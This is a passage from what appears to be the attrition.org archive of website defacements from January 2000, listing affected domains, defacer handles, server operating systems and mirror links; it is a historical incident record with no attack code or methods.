www.usabia.org (206.253.222.119), 30 hops max, 40 byte packets [snip..] 8 internapsea-gw.customer.ALTER.NET (157.130.178.34) 36.115 ms 36.477 ms 37.414 ms 9 border3bs.fe0-0-0-fenet1.sea.pnap.net (206.253.192.139) 37.879 ms 35.513 ms 39.053 ms 10 server28.hypermart.net (206.253.222.119) 36.521 ms 39.691 ms 38.48 ms Defaced domain: www.lucent.com.tw Site Title: Lucent Technologies Co Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.lucent.com.tw Defaced by: inferno.br Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.jbflint.com Site Title: Jim Bell & Son, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.jbflint.com Defaced by: artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.imsoelite.com Site Title: Matthew Price Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.imsoelite.com Operating System: Solaris 2.6 - 2.7 Potentially offensive content on defaced page. Defaced domain: www.cyberenvoy.com Site Title: Westech SDC, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cyberenvoy.com Defaced by: pH Operating System: BSDI Potentially offensive content on defaced page. Defaced domain: www.riopoty.com.br Site Title: Hotel Rio Poty S/A Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.riopoty.com.br Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.encamp.ad Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.encamp.ad Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.familycomputerworkshop.com Site Title: Family Computer Workshop Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.familycomputerworkshop.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.30 99.12.29 by OHB BLN Potentially offensive content on defaced page. Defaced domain: ntserver01.thomastonschools.org Site Title: Thomaston Public Schools Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/ntserver01.thomastonschools.org Defaced by: Keebler Elf Operating System: Windows NT (IBM-ICS/4.2.1.7) Potentially offensive content on defaced page. Defaced domain: www.segup.pa.gov.br Site Title: Governo Do Estado Do Para Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.segup.pa.gov.br Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.aua.am Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.aua.am Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.aaesa.org Site Title: American Association of Educational Service Agencies Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.aaesa.org Defaced by: sh00tr Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.wpoint.com.br Site Title: Net Sistema Telecomunicacoes Ltda Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.wpoint.com.br Defaced by: OHB Team Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.hasp.org.br Site Title: Hospital Adventista de São Paulo Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.hasp.org.br Defaced by: The Killer Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.webavenue.co.za Site Title: Web Avenue S.A Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.webavenue.co.za Defaced by: #Dorknet Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.scania.co.uk Site Title: Scania Computer Services Ltd Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.scania.co.uk Defaced by: Dr_Delete Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.rsfm.co.za Site Title: RSFM Online Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.rsfm.co.za Defaced by: Tr1pl3 S31S Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.malealea.co.ls Site Title: Malealea Lodge in Lesotho Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.malealea.co.ls Defaced by: unknown Operating System: Windows NT Defaced domain: gospelmusic.com.br Site Title: Open Computer Ltda Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/gospelmusic.com.br Defaced by: blackc0de Operating System: BSDI 3.x Potentially offensive content on defaced page. Defaced domain: www.starrett.com Site Title: The L.S. Starrett Company Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.starrett.com Defaced by: WOH Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.addsoft.net Site Title: Addsoft Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.addsoft.net Defaced by: WOH Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.scania.co.uk Site Title: Scania COmputer Services Ltd Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.scania.co.uk Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Previously defaced on today by redefacing is lame Potentially offensive content on defaced page. Defaced domain: www.addsoft.net Site Title: Addsoft Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.addsoft.net Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Previously defaced on today by redefacing is lame Potentially offensive content on defaced page. Defaced domain: www.sex-100.com Site Title: The Hang Loose Bastards Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.sex-100.com Defaced by: Counter Culture Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.sespa.pa.gov.br Site Title: Governo Do Estado do Para Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.sespa.pa.gov.br Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Site Title: Governo Do Estado de Sao Paulo Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.cpa.sp.gov.br Defaced by: OHB Operating System: Windows NT (IIS/3.0) Previously defaced on 00.01.22 by Fuck Spy Potentially offensive content on defaced page Defaced domain: www7.prodepa.gov.br Site Title: Prodepa - Processamento De Dados Do Estado Do Para Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www7.prodepa.gov.br Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.c-cube.net Site Title: Convergent Communications Consultants Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.c-cube.net Defaced by: ManicDVLN Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: bassd.labs.pulltheplug.com Site Title: PullthePlug Tech. Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/bassd.labs.pulltheplug.com Defaced by: XBC Operating System: FreeBSD Defaced domain: www.clanberries.com Site Title: Clanberries Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.clanberries.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ncr.org Site Title: National Church Residences Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.ncr.org Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: hcrp.fmrp.usp.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/hcrp.fmrp.usp.br Defaced by: thekiller Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.camm.it Site Title: Sviluppo Softare C.A.D. Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.camm.it Defaced by: r4z Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.animerica.com Site Title: Animerica Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.animerica.com Defaced by: bansh33 Operating System: Windows NT Defaced domain: www.ihip.pku.edu.cn Site Title: Institute of Heavy Ion Physics Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.ihip.pku.edu.cn Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.teknology-source.com Site Title: Technology Source Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.teknology-source.com Defaced by: auto360 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.caligari.com Site Title: Caligari COrp. Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.caligari.com Defaced by: messiah Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.caligari.com Site Title: Caligari COrp. Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.caligari.com Defaced by: messiah Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: ryecityschools.lhric.org Site Title: B.O.C.E.S. Southern Westchester Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/ryecityschools.lhric.org Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.wondergifts.com Site Title: Wonder Gifts Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.wondergifts.com Defaced by: auto360 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.webtology.com Site Title: Webtology Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.webtology.com Defaced by: auto360 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.whitefox.net Site Title: C&M Consulting Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.whitefox.net Defaced by: auto360 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.hoaa.com Site Title: Home Association of America Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.hoaa.com Defaced by: Team Echo Operating System: BSDI 3.x Potentially offensive content on defaced page. Defaced domain: www.ransom.org Site Title: Ransom Memorial Hospital Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.ransom.org Defaced by: operação arrastão Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.eichertrail.com Site Title: The Eicher Trail Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.eichertrail.com Defaced by: t.s.g.u. Operating System: Irix Defaced domain: www.kkh.com.sg Site Title: KK Women's & Children's Hospital Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.kkh.com.sg Defaced by: operação arrastão Operating System: Windows NT ATTRITION Staff Comment: This is the second hospital defaced by this group Defaced domain: www.subterminal.com Site Title: Subterminal Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.subterminal.com Defaced by: Artech Operating System: Windows NT Defaced domain: redelet.etfgo.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/redelet.etfgo.br Defaced by: thekiller Operating System: Linux Potentially offensive content on defaced page. Defaced domain: barney.wr.usgs.gov Site Title: United States Geological Survey Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/barney.wr.usgs.gov Defaced by: Dead-Socket Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.webzsite.com Site Title: Webzsite.com - Brock Eastman Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.webzsite.com Defaced by: cybernetix Operating System: Linux Potentially offensive content on defaced page Defaced domain: www.campaignzone.com Site Title: goGrrl Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.campaignzone.com Defaced by: artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ransom.org Site Title: Ransom Memorial Hospital Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.ransom.org Defaced by: operação arrastão Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.wretchedmusic.com Site Title: Wretched Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.wretchedmusic.com Defaced by: auto360 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.normsterling.com Site Title: Norm Sterling, MPP Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.normsterling.com Defaced by: moron Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.toy-soldier.com Site Title: Toy Soldier Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.toy-soldier.com Defaced by: BlacKcODe Operating System: Windows nT Defaced domain: www.ransom.org Site Title: Ransom Memorial Hospital Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.ransom.org Defaced by: p4riah Operating System: Windows NT Previously defaced on today by Potentially offensive content on defaced page. Defaced domain: www.sta.go.jp Site Title: Japan Science and Technology Agency Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.sta.go.jp Defaced by: ch1n4 Previously defaced on: 01.24.00 Previously defaced by: Brazil p00 hackerz Operating System: unknown Potentially offensive content on defaced page. Defaced domain: www.sta.go.jp Site Title: Japan Science and Technology Agency Date: Defaced on 01.24.00 Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.sta.go.jp Defaced by: Brazil p00 hackerz Operating System: unknown Potentially offensive content on defaced page. Note: According to articles from AP and Reuters, this is the first known defacement of a Japanese Government server. domain: www.stat.go.jp Site Title: Japanese Statistics Bureau Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.stat.go.jp Defaced by: Miracle Operating System: Solaris (CERN/3.0A) Potentially offensive content on defaced page. ATTRITION Staff Comment: This is the 3rd Japanese Government Web server defaced in days. Defaced domain: www.chirolink.com Site Title: Computer Information Exchange Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.chirolink.com Defaced by: messiah Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.ecrc.gmu.edu Site Title: George Mason University Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.ecrc.gmu.edu Defaced by: Oystr and Klam Operating System: Solaris 2.5x Potentially offensive content on defaced page. ATTRITION Staff Comment: Mass hack w/ www.fecrc.com Defaced domain: www.menofcolor2000.com Site Title: Gemini Productions Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.menofcolor2000.com Defaced by: pH Operating System: BSDI 7.0 Potentially offensive content on defaced page. Defaced domain: www.eli.com Site Title: E. L. I. Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.eli.com Defaced by: Potus and PurpZeY Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.riopoty.com.br Site Title: Hotel Rio Poty S/A Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.riopoty.com.br Defaced by: (can't read the names) Operating System: Windows NT (IIS/4.0) Previously defaced on 00.01.23 by OHB Potentially offensive content on defaced page. Defaced domain: www.data1000.com.br Site Title: Data1000 Processamento De Dados LTDA Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.data1000.com.br Defaced by: Crime Boys Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.koogrules.com Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.koogrules.com Defaced by: BlackLion Operating System: FreeBSD 2.2.1 - 4.0 Potentially offensive content on defaced page. Defaced domain: www.texasbookdepot.com Site Title: Texas Book Depot Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.texasbookdepot.com Defaced by: ReDDCell Operating System: BSDI 7.0 Potentially offensive content on defaced page. Defaced domain: www.sex-1000.com Site Title: Karen Vardanian Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.sex-1000.com Defaced by: ??? Operating System: Windows NT (IIS/4.0) Previously defaced on 00.01.23 by Counter Culture Potentially offensive content on defaced page. Defaced domain: www.sltins.com Site Title: Southwestern Financial Services Corp Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/www.sltins.com Defaced by: Crime Boys Operating System: BSDI 3.x Previously defaced on 99.08.15 by Potentially offensive content on defaced page. Defaced domain: www.sine.pi.gov.br Site Title: Governo do Estado do Piaui Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.sine.pi.gov.br Defaced by: Crime Boy's Operating System: Windwos NT Potentially offensive content on defaced page. Defaced domain: apes.ag.unr.edu Site Title: University of Nevada Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/apes.ag.unr.edu Defaced by: Team Echo Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: deptinfo.collegeem.qc.ca Site Title: College Edouard-Montpetit Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/deptinfo.collegeem.qc.ca Defaced by: Synoptic Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mooney.com Site Title: Mooney Aircraft, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/www.mooney.com Defaced by: PurpZey Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.credible.com Site Title: Computer Credible Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/www.credible.com Defaced by: Crime Boys Operating System: Windows NT (IIS/3.0) Previously defaced on 99.10.16 by FADFUCK Potentially offensive content on defaced page. Defaced domain: horizonsrv1.horizonpestcontrol.com Site Title: Horizon Pest Control Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/horizonsrv1.horizonpestcontrol.com Defaced by: The Keebler Elf Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: course.utsi.edu Site Title: University of Tennessee Space Institute Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/course.utsi.edu Defaced by: Team Echo Operating System: Windows NT (PWS-95/2.0) Potentially offensive content on defaced page. Defaced domain: www.kia.gov.kw Site Title: Kuwait Government Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.kia.gov.kw Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.aneel.gov.br Site Title: Aneel-Agencia Nacional de Energia Eletrica Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.aneel.gov.br Defaced by: Rogue Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.stileproject.com Site Title: Stile Project Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.stileproject.com Defaced by: C.M.A.S Operating System: Linux Potentially offensive content on defaced page. ATTRITION Staff Comment: Interesting political type hack Defaced domain: www.ukrin.com Site Title: Nowicky Pharma Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.ukrin.com Defaced by: slash Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.php.com Site Title: Family Resource Center Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.php.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.okinawa.mpt.go.jp Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.okinawa.mpt.go.jp Defaced by: Chinese Operating System: Solaris 2.5x HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.porno.co.za Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.porno.co.za Operating System: Red Hat Linux HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.cevi.be Site Title: Belgium Centrum voor Informatica Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.cevi.be Operating System: Windows NT (Microsoft-IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.evvcivitan.org Site Title: Evansville Downtown Civitan Club Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.evvcivitan.org Defaced by: Pimp Operating System: Windows NT (Microsoft-IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.vea.org Site Title: Virtual Enterprises Association Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.vea.org Defaced by: slash Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page Defaced domain: www.undac.edu.pe Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.undac.edu.pe Defaced by: shredder Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.lakelandc.ab.ca Site Title: Lakeland College Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.lakelandc.ab.ca Defaced by: Net Illusion Potentially offensive content on defaced page. Defaced domain: www.nygatour.com Site Title: National Youth Golf Association Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.nygatour.com Defaced by: Artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mbce.com.sa Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.mbce.com.sa Defaced by: Artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.root.or.jp Site Title: root-net Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.root.or.jp Defaced by: fzk (China) Operating System: Windows NT (IIS/3.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.tmig.or.jp Site Title: Tokyo Metropolitan Institute of Gerontology Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.tmig.or.jp Defaced by: China guangdong fzk Operating System: Solaris 2.3 - 2.4 HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: niu2.uniplac.rct-sc.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/niu2.uniplac.rct-sc.br Defaced by: dexter07 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: apes.ag.unr.edu Site Title: University of Nevada Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/apes.ag.unr.edu Defaced by: Team Echo Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.kidslearning.com Site Title: kids Learning Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.kidslearning.com Defaced by: thekiller Operating System: Windows 3.11 or 95 (Netscape-FastTrack/2.0a) Potentially offensive content on defaced page. Site Title: Alexei Malofeyev Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.xxx-boys.com Defaced by: Counter Culture Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.meikai.ac.jp Site Title: Meikai University Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.meikai.ac.jp Defaced by: fzk (China) Operating System: Solaris HIDDEN comments in the HTML. Potentially offensive content on defaced page. ATTRITION Staff Comment: The defacers left an email to reach them at in the HTML comments Defaced domain: www.ccpm.com.mx Site Title: CCPM Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.ccpm.com.mx Defaced by: alt3kx_h3z Operating System: Solaris Defaced domain: www.cdcs.com Site Title: C & D Consulting, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.cdcs.com Defaced by: PKiller Operating System: Windows NT Previously defaced on 99.11.14 00.01.22 by DHC slash Defaced domain: www.hackernews.com.br Site Title: Hacker News Brazil Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.hackernews.com.br Defaced by: DHC Operating System: Windows NT Potentially offensive content on defaced page. ATTRITION Staff Comment: It seems that DHC received the password from someone with HNB and then defaced it. Defaced domain: as041.tel.hr Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/as041.tel.hr Defaced by: netJoy Operating System: Digital Unix Potentially offensive content on defaced page. Defaced domain: www.claudiaschiffer.com Site Title: ptn media Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.claudiaschiffer.com Defaced by: Dr_Delete Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.maxflow.com Site Title: Maxflow, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.maxflow.com Defaced by: madhatt Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.nat32.com Site Title: A.C.T. Software Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.nat32.com Defaced by: madhatt Operating System: Linux Potentially offensive content on defaced page. Site Title: SQL Systems Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.teamsql.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.topeo.com Site Title: Topeo Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.topeo.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ptnmediainc.com Site Title: PTN Media Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.ptnmediainc.com Defaced by: Artech Operating System: Windows NT Defaced domain: www.salmankhan.com Site Title: 481540 B.C. LTD. Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.salmankhan.com Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.ccpm.com.mx Site Title: Grupo C.C.P.M Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.ccpm.com.mx Defaced by: kryptek Operating System: Solaris 2.5x Previously defaced on today by Potentially offensive content on defaced page. Defaced domain: www.one24.com Site Title: ONE24, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.one24.com Defaced by: wkD Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: www.jvc-america.com Site Title: Rocktropolis Enterprises Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.jvc-america.com Defaced by: messiah Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.vcandrews.org Site Title: Garden in the Sky (VC Andrews fan site) Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.vcandrews.org Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.scas.acad.bg Site Title: Bulgarian Student Computer Arts Society Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.scas.acad.bg Defaced by: The Killer Operating System: Windows 95 (Microsoft-PWS-95/2.0) Potentially offensive content on defaced page Defaced domain: www.cevi.be Site Title: CEVI Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.cevi.be Defaced by: Carteblanche Operating System: NT Previously defaced on 00.01.29 by Potentially offensive content on defaced page. Defaced domain: www.temperance.com Site Title: La Temperance Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.temperance.com Defaced by: madhatt Operating System: Cobalt Linux Defaced domain: www.chesapeake-rehab.com Site Title: CHesapeake Rehab Equipment Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.chesapeake-rehab.com Defaced by: thekiller Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.travelersaid.org Site Title: Travelers Aid International Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.travelersaid.org Defaced by: Crime Boy's Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.18 by Analognet Potentially offensive content on defaced page. ATTRITION Staff Comment: Also defaced: www.cisasailing.org Defaced domain: www.webdr.com Site Title: The WEB Doctor Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.webdr.com Defaced by: wkD Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www-jmt.jst.go.jp Site Title: Japan Science and Technology Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www-jmt.jst.go.jp Defaced by: wds Operating System: Solaris 2.3 - 2.4 Potentially offensive content on defaced page. Defaced domain: www.zajtra.com Site Title: Zajtra Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.zajtra.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.mbce.com.sa Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.mbce.com.sa Defaced by: VSO Inc Operating System: Windows NT (IIS/4.0) Previously defaced on 00.01.30 by Artech Potentially offensive content on defaced page. Defaced domain: www.zonked.com Site Title: Ian Mack Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.zonked.com Defaced by: p4riah Operating System: WIndows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: seoulca.seoulcad.co.kr Site Title: Seoul JeonSan HakWon Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/seoulca.seoulcad.co.kr Defaced by: synk Operating System: ALZZA/Linux Potentially offensive content on defaced page. Defaced domain: absence.vortexq.com Site Title: Vortex Q Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/absence.vortexq.com Defaced by: savecore Operating System: FreeBSD 2.2.1 - 4.0 HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.th-bandt.com Site Title: Cyber Cigar Direct Worldwide Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.th-bandt.com Defaced by: p4riah Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.levi.com Site Title: Levi Strauss & Company Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.levi.com Defaced by: avirex Operating System: WinNT Potentially offensive content on defaced page. Defaced domain: www.pioneer.com.tw Site Title: Vanguard Secureity Co Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.pioneer.com.tw Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ironcurtaincorp.com Site Title: Iron Curtain Corp Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.ironcurtaincorp.com Defaced by: snow Operating System: Red Hat Linux HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.mct.ro Site Title: Romanian Ministry of Research and Technology Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.mct.ro Defaced by: The Killer Operating System: Windows NT Defaced domain: www.vsop.isas.ac.jp Site Title: Japanese Institute of Space and Astronautical Science, VLBI Space Observatory Programme Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.vsop.isas.ac.jp Defaced by: fzk Operating System: Solaris HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.schs.org Site Title: South Christian High School Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.schs.org Defaced by: TWS Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.jvcinfo.com Site Title: JVC Information Products Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.jvcinfo.com Defaced by: Crime Boys Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: 